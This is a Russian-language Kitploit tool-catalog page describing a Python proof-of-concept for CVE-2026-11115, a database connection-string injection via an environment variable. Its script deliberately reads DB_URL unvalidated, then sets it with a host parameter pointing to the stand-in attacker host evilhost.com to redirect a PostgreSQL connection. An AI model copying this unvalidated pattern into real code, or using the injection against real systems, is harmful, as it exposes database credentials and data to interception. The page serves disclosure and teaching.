Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — Минимальный PoC на Python для CVE-2026-11115, демонстрирующий инъекцию строки подключения к базе данных через переменные окружения и перенаправление на управляемые атакующим хосты PostgreSQL. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеНеправильная КонфигурацияОбучение и ОбразованиеБезопасность Баз Данных
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

Минимальный PoC на Python для CVE-2026-11115, демонстрирующий инъекцию строки подключения к базе данных через переменные окружения и перенаправление на управляемые атакующим хосты PostgreSQL.

Репозиторий
51 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-11115 – Внедрение строки подключения к базе данных через переменную окружения

Код программы (Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – Внедрение строки подключения к базе данных

Severity: High

Обзор

Приложение формирует строку подключения к базе данных на основе переменной окружения без проверки. Если злоумышленник может повлиять на эту переменную (например, через подделку серверных запросов (SSRF) или неправильную конфигурацию конвейера CI/CD), он может перенаправить подключение к базе данных на свой сервер, перехватывая или изменяя данные.

Детали уязвимости

  • Тип: Внедрение строки подключения
  • Воздействие: Эксфильтрация данных, атака «человек посередине».
  • Корневая причина: Полный URI подключения берётся из переменной окружения, и дополнительные параметры (например, host) могут быть добавлены для переопределения исходного хоста.

Демонстрация эксплуатации

Запустите симуляцию:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

Программа пытается подключиться к evilhost.com вместо localhost.

Скачать инструмент